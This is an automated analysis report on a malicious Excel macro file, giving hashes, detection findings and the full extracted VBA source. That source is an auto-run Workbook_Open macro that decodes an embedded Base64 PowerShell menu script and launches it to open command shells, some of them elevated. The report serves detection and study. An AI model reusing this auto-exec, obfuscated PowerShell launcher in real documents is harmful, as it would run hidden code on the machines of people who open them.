Office (OLE) / .XLS malware analysis — malicious · a78c1d1ec24d6dc4

MALICIOUS

Office (OLE) / .XLS

55.0 KB Created: 2022-12-29 03:58:56 Authoring application: Microsoft Excel First seen: 2026-06-23

MD5: cccb8fde235f6313e4a77b65e59a5815 SHA-1: 7e111d28ad791e86a1c800ec248e8df04b7cb58e SHA-256: a78c1d1ec24d6dc472ef2b60744b18acffd538f2661a3c600b66bf7c1857310d

428 Risk Score

Heuristics 10

VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    Dim shell As Object
```
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set shell = CreateObject("Wscript.shell")
```

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

        pspath = shell.ExpandEnvironmentStrings("%windir%") & "\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
Matched line in script
```
    Set cols = CreateObject("WbemScripting.SWbemLocator").ConnectServer.ExecQuery("Select * From Win32_OperatingSystem")
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    Set cols = CreateObject("WbemScripting.SWbemLocator").ConnectServer.ExecQuery("Select * From Win32_OperatingSystem")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6296 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6296 bytes
SHA-256: `2620ae659a2b6f804d51030cbe3839dca234c9efd80321c93901e5cb645b2604`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Const vbHide = 0 Private Const vbNormalFocus = 1 Private Function Isx64() As Boolean Dim cols As Object Dim col As Object Dim ret As Boolean ret = False Set cols = CreateObject("WbemScripting.SWbemLocator").ConnectServer.ExecQuery("Select * From Win32_OperatingSystem") For Each col In cols If InStr(col.OSArchitecture, "64") Then ret = True Exit For End If Next Isx64 = ret End Function Private Function EncodeScript(ByRef text As String) As String Dim bin() As Byte Dim node As Object Set node = CreateObject("Msxml2.DOMDocument.3.0").createElement("base64") bin = text node.DataType = "bin.base64" node.nodeTypedValue = bin EncodeScript = Replace(node.text, vbLf, "") Set node = Nothing End Function Private Function DecodeBase64(ByRef base64 As String) As String Dim node As Object Dim adost As Object Set node = CreateObject("Msxml2.DOMDocument.3.0").createElement("base64") node.DataType = "bin.base64" node.text = base64 Set adost = CreateObject("ADODB.Stream") adost.Type = 1 ' adTypeBinary adost.Open adost.Write node.nodeTypedValue adost.Position = 0 adost.Type = 2 ' adTypeText adost.Charset = "utf-8" DecodeBase64 = adost.ReadText Set adost = Nothing Set node = Nothing End Function Private Function LocalScript() As String Dim s As String s = "Y2xhc3MgTWVudSB7CiAgICBbc3RyaW5nXSRob21lX2RpcgogICAgW3N0cmluZ10kbXlfc2Ny" s = s + "aXB0CgogICAgTWVudShbTWFuYWdlbWVudC5BdXRvbWF0aW9uLkludm9jYXRpb25JbmZvXSRp" s = s + "bmZvKSB7CiAgICAgICAgJHRoaXMuaG9tZV9kaXIgPSBbSU8uUGF0aF06OkdldFRlbXBQYXRo" s = s + "KCkKICAgICAgICBpZiAoW3N0cmluZ106OklzTnVsbE9yRW1wdHkoJGluZm8uTXlDb21tYW5k" s = s + "LlBhdGgpKSB7CiAgICAgICAgICAgICR0aGlzLm15X3NjcmlwdCA9ICRpbmZvLk15Q29tbWFu" s = s + "ZAogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICR0aGlzLm15X3NjcmlwdCA9IFtJTy5G" s = s + "aWxlXTo6UmVhZEFsbFRleHQoJGluZm8uTXlDb21tYW5kLlBhdGgpCiAgICAgICAgfQogICAg" s = s + "fQoKICAgIGhpZGRlbiBbYm9vbF1MYXVuY2hDb21tYW5kKCRjbWQpIHsKICAgICAgICBzd2l0" s = s + "Y2ggKCRjbWQpIHsKICAgICAgICAgICAgIjAiIHsKICAgICAgICAgICAgICAgICRzY3JpcHRf" s = s + "YjY0ID0gW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVuaWNv" s = s + "ZGUuR2V0Qnl0ZXMoJHRoaXMubXlfc2NyaXB0KSkKICAgICAgICAgICAgICAgIFN0YXJ0LVBy" s = s + "b2Nlc3MgLUZpbGVQYXRoICJwb3dlcnNoZWxsLmV4ZSIgLXZlcmIgcnVuYXMgLUFyZ3VtZW50" s = s + "TGlzdCBAKCItZSIsICRzY3JpcHRfYjY0KQogICAgICAgICAgICB9CiAgICAgICAgICAgICIx" s = s + "IiB7CiAgICAgICAgICAgICAgICBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAiZXhwbG9yZXIu" s = s + "ZXhlIiAtQXJndW1lbnRMaXN0IEAoJHRoaXMuaG9tZV9kaXIpCiAgICAgICAgICAgIH0KICAg" s = s + "ICAgICAgICAgIjIiIHsKICAgICAgICAgICAgICAgIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRo" s = s + "ICJjbWQuZXhlIiAtV29ya2luZ0RpcmVjdG9yeSAkdGhpcy5ob21lX2RpcgogICAgICAgICAg" s = s + "ICB9CiAgICAgICAgICAgICIzIiB7CiAgICAgICAgICAgICAgICBTdGFydC1Qcm9jZXNzIC1G" s = s + "aWxlUGF0aCAicG93ZXJzaGVsbC5leGUiIC1Xb3JraW5nRGlyZWN0b3J5ICR0aGlzLmhvbWVf" s = s + "ZGlyCiAgICAgICAgICAgIH0KICAgICAgICAgICAgIjQiIHsKICAgICAgICAgICAgICAgICRh" s = s + "cmdzID0gQCgiL2sgY2QgL2QgYCIkKCR0aGlzLmhvbWVfZGlyKWAiIikKICAgICAgICAgICAg" s = s + "ICAgIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJjbWQuZXhlIiAtdmVyYiBydW5hcyAtQXJn" s = s + "dW1lbnRMaXN0ICRhcmdzCiAgICAgICAgICAgIH0KICAgICAgICAgICAgIjUiIHsKICAgICAg" s = s + "ICAgICAgICAgICRhcmdzID0gQCgiLU5vRXhpdCIsICItQ29tbWFuZCIsICJjZCBgIiIgKyAk" s = s + "dGhpcy5ob21lX2RpciArICJgIiIpCiAgICAgICAgICAgICAgICBTdGFydC1Qcm9jZXNzIC1G" s = s + "aWxlUGF0aCAicG93ZXJzaGVsbC5leGUiIC12ZXJiIHJ1bmFzIC1Bcmd1bWVudExpc3QgJGFy" s = s + "Z3MKICAgICAgICAgICAgfQogICAgICAgICAgICBkZWZhdWx0IHsKICAgICAgICAgICAgICAg" s = s + "IHJldHVybiAkZmFsc2UKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm4g" s = s + "JHRydWUKICAgIH0KCiAgICBbdm9pZF1PcGVuTWVudSgpIHsKICAgICAgICBXcml0ZS1Ib3N0" s = s + "ICJDb3J2ZXR0ZSIKICAgICAgICB3aGlsZSAoJHRydWUpIHsKICAgICAgICAgICAgV3JpdGUt" s = s + "SG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIgogICAgICAgICAg" s = s + "ICBXcml0ZS1Ib3N0ICIgMCkgUnVuIGFzIGFkbWluaXN0cmF0b3IiCiAgICAgICAgICAgIFdy" s = s + "aXRlLUhvc3QgIiAxKSBPcGVuIGFuIGV4cGxvcmVyIgogICAgICAgICAgICBXcml0ZS1Ib3N0" s = s + "ICIgMikgQ3JlYXRlIGEgbmV3IGNvbW1hbmQgc2hlbGwiCiAgICAgICAgICAgIFdyaXRlLUhv" s = s + "c3QgIiAzKSBDcmVhdGUgYSBuZXcgcG93ZXJzaGVsbCIKICAgICAgICAgICAgV3JpdGUtSG9z" s = s + "dCAiIDQpIENyZWF0ZSBhIG5ldyBjb21tYW5kIHNoZWxsIChSdW4gYXMgYWRtaW5pc3RyYXRv" s = s + "cikiCiAgICAgICAgICAgIFdyaXRlLUhvc3QgIiA1KSBDcmVhdGUgYSBuZXcgcG93ZXJzaGVs" s = s + "bCAoUnVuIGFzIGFkbWluaXN0cmF0b3IpIgoKICAgICAgICAgICAgd2hpbGUgKCEkdGhpcy5M" s = s + "YXVuY2hDb21tYW5kKChSZWFkLUhvc3QgIlBsZWFzZSBjaG9vc2UgYSBtZW51IGl0ZW0gdG8g" s = s + "cnVuIikpKSB7fQogICAgICAgIH0KICAgIH0KfQpbTWVudV06Ok5ldygkTXlJbnZvY2F0aW9u" s = s + "KS5PcGVuTWVudSgpCg==" LocalScript = s End Function Private Sub Workbook_Open() Dim shell As Object Dim script As String Dim pspath As String Set shell = CreateObject("Wscript.shell") If Isx64() Then pspath = shell.ExpandEnvironmentStrings("%windir%") & "\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Else pspath = shell.ExpandEnvironmentStrings("%windir%") & "\System32\WindowsPowerShell\v1.0\powershell.exe" End If script = EncodeScript(DecodeBase64(LocalScript())) Dim ret As Integer ret = shell.Run(pspath & " -e " & script, vbNormalFocus, False) End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 2620ae659a2b6f804d51030cbe3839dca234c9efd80321c93901e5cb645b2604

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Const vbHide = 0
Private Const vbNormalFocus = 1


Private Function Isx64() As Boolean
    Dim cols As Object
    Dim col As Object
    Dim ret As Boolean
  
    ret = False
    Set cols = CreateObject("WbemScripting.SWbemLocator").ConnectServer.ExecQuery("Select * From Win32_OperatingSystem")
    For Each col In cols
        If InStr(col.OSArchitecture, "64") Then
            ret = True
            Exit For
        End If
    Next
    Isx64 = ret
End Function

Private Function EncodeScript(ByRef text As String) As String
    Dim bin() As Byte
    Dim node As Object
    Set node = CreateObject("Msxml2.DOMDocument.3.0").createElement("base64")
    bin = text

    node.DataType = "bin.base64"
    node.nodeTypedValue = bin

    EncodeScript = Replace(node.text, vbLf, "")
    Set node = Nothing
End Function

Private Function DecodeBase64(ByRef base64 As String) As String
    Dim node As Object
    Dim adost As Object
    Set node = CreateObject("Msxml2.DOMDocument.3.0").createElement("base64")
    
    node.DataType = "bin.base64"
    node.text = base64

    Set adost = CreateObject("ADODB.Stream")
    adost.Type = 1 ' adTypeBinary
    adost.Open
    adost.Write node.nodeTypedValue
    adost.Position = 0
    adost.Type = 2 ' adTypeText
    adost.Charset = "utf-8"
    DecodeBase64 = adost.ReadText

    Set adost = Nothing
    Set node = Nothing
End Function

Private Function LocalScript() As String
    Dim s As String

    s = "Y2xhc3MgTWVudSB7CiAgICBbc3RyaW5nXSRob21lX2RpcgogICAgW3N0cmluZ10kbXlfc2Ny"
    s = s + "aXB0CgogICAgTWVudShbTWFuYWdlbWVudC5BdXRvbWF0aW9uLkludm9jYXRpb25JbmZvXSRp"
    s = s + "bmZvKSB7CiAgICAgICAgJHRoaXMuaG9tZV9kaXIgPSBbSU8uUGF0aF06OkdldFRlbXBQYXRo"
    s = s + "KCkKICAgICAgICBpZiAoW3N0cmluZ106OklzTnVsbE9yRW1wdHkoJGluZm8uTXlDb21tYW5k"
    s = s + "LlBhdGgpKSB7CiAgICAgICAgICAgICR0aGlzLm15X3NjcmlwdCA9ICRpbmZvLk15Q29tbWFu"
    s = s + "ZAogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICR0aGlzLm15X3NjcmlwdCA9IFtJTy5G"
    s = s + "aWxlXTo6UmVhZEFsbFRleHQoJGluZm8uTXlDb21tYW5kLlBhdGgpCiAgICAgICAgfQogICAg"
    s = s + "fQoKICAgIGhpZGRlbiBbYm9vbF1MYXVuY2hDb21tYW5kKCRjbWQpIHsKICAgICAgICBzd2l0"
    s = s + "Y2ggKCRjbWQpIHsKICAgICAgICAgICAgIjAiIHsKICAgICAgICAgICAgICAgICRzY3JpcHRf"
    s = s + "YjY0ID0gW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVuaWNv"
    s = s + "ZGUuR2V0Qnl0ZXMoJHRoaXMubXlfc2NyaXB0KSkKICAgICAgICAgICAgICAgIFN0YXJ0LVBy"
    s = s + "b2Nlc3MgLUZpbGVQYXRoICJwb3dlcnNoZWxsLmV4ZSIgLXZlcmIgcnVuYXMgLUFyZ3VtZW50"
    s = s + "TGlzdCBAKCItZSIsICRzY3JpcHRfYjY0KQogICAgICAgICAgICB9CiAgICAgICAgICAgICIx"
    s = s + "IiB7CiAgICAgICAgICAgICAgICBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAiZXhwbG9yZXIu"
    s = s + "ZXhlIiAtQXJndW1lbnRMaXN0IEAoJHRoaXMuaG9tZV9kaXIpCiAgICAgICAgICAgIH0KICAg"
    s = s + "ICAgICAgICAgIjIiIHsKICAgICAgICAgICAgICAgIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRo"
    s = s + "ICJjbWQuZXhlIiAtV29ya2luZ0RpcmVjdG9yeSAkdGhpcy5ob21lX2RpcgogICAgICAgICAg"
    s = s + "ICB9CiAgICAgICAgICAgICIzIiB7CiAgICAgICAgICAgICAgICBTdGFydC1Qcm9jZXNzIC1G"
    s = s + "aWxlUGF0aCAicG93ZXJzaGVsbC5leGUiIC1Xb3JraW5nRGlyZWN0b3J5ICR0aGlzLmhvbWVf"
    s = s + "ZGlyCiAgICAgICAgICAgIH0KICAgICAgICAgICAgIjQiIHsKICAgICAgICAgICAgICAgICRh"
    s = s + "cmdzID0gQCgiL2sgY2QgL2QgYCIkKCR0aGlzLmhvbWVfZGlyKWAiIikKICAgICAgICAgICAg"
    s = s + "ICAgIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJjbWQuZXhlIiAtdmVyYiBydW5hcyAtQXJn"
    s = s + "dW1lbnRMaXN0ICRhcmdzCiAgICAgICAgICAgIH0KICAgICAgICAgICAgIjUiIHsKICAgICAg"
    s = s + "ICAgICAgICAgICRhcmdzID0gQCgiLU5vRXhpdCIsICItQ29tbWFuZCIsICJjZCBgIiIgKyAk"
    s = s + "dGhpcy5ob21lX2RpciArICJgIiIpCiAgICAgICAgICAgICAgICBTdGFydC1Qcm9jZXNzIC1G"
    s = s + "aWxlUGF0aCAicG93ZXJzaGVsbC5leGUiIC12ZXJiIHJ1bmFzIC1Bcmd1bWVudExpc3QgJGFy"
    s = s + "Z3MKICAgICAgICAgICAgfQogICAgICAgICAgICBkZWZhdWx0IHsKICAgICAgICAgICAgICAg"
    s = s + "IHJldHVybiAkZmFsc2UKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm4g"
    s = s + "JHRydWUKICAgIH0KCiAgICBbdm9pZF1PcGVuTWVudSgpIHsKICAgICAgICBXcml0ZS1Ib3N0"
    s = s + "ICJDb3J2ZXR0ZSIKICAgICAgICB3aGlsZSAoJHRydWUpIHsKICAgICAgICAgICAgV3JpdGUt"
    s = s + "SG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIgogICAgICAgICAg"
    s = s + "ICBXcml0ZS1Ib3N0ICIgMCkgUnVuIGFzIGFkbWluaXN0cmF0b3IiCiAgICAgICAgICAgIFdy"
    s = s + "aXRlLUhvc3QgIiAxKSBPcGVuIGFuIGV4cGxvcmVyIgogICAgICAgICAgICBXcml0ZS1Ib3N0"
    s = s + "ICIgMikgQ3JlYXRlIGEgbmV3IGNvbW1hbmQgc2hlbGwiCiAgICAgICAgICAgIFdyaXRlLUhv"
    s = s + "c3QgIiAzKSBDcmVhdGUgYSBuZXcgcG93ZXJzaGVsbCIKICAgICAgICAgICAgV3JpdGUtSG9z"
    s = s + "dCAiIDQpIENyZWF0ZSBhIG5ldyBjb21tYW5kIHNoZWxsIChSdW4gYXMgYWRtaW5pc3RyYXRv"
    s = s + "cikiCiAgICAgICAgICAgIFdyaXRlLUhvc3QgIiA1KSBDcmVhdGUgYSBuZXcgcG93ZXJzaGVs"
    s = s + "bCAoUnVuIGFzIGFkbWluaXN0cmF0b3IpIgoKICAgICAgICAgICAgd2hpbGUgKCEkdGhpcy5M"
    s = s + "YXVuY2hDb21tYW5kKChSZWFkLUhvc3QgIlBsZWFzZSBjaG9vc2UgYSBtZW51IGl0ZW0gdG8g"
    s = s + "cnVuIikpKSB7fQogICAgICAgIH0KICAgIH0KfQpbTWVudV06Ok5ldygkTXlJbnZvY2F0aW9u"
    s = s + "KS5PcGVuTWVudSgpCg=="

    LocalScript = s
End Function


Private Sub Workbook_Open()
    Dim shell As Object
    Dim script As String
    Dim pspath As String
    
    Set shell = CreateObject("Wscript.shell")
    If Isx64() Then
        pspath = shell.ExpandEnvironmentStrings("%windir%") & "\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    Else
        pspath = shell.ExpandEnvironmentStrings("%windir%") & "\System32\WindowsPowerShell\v1.0\powershell.exe"
    End If

    script = EncodeScript(DecodeBase64(LocalScript()))

    Dim ret As Integer
    ret = shell.Run(pspath & " -e " & script, vbNormalFocus, False)

End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.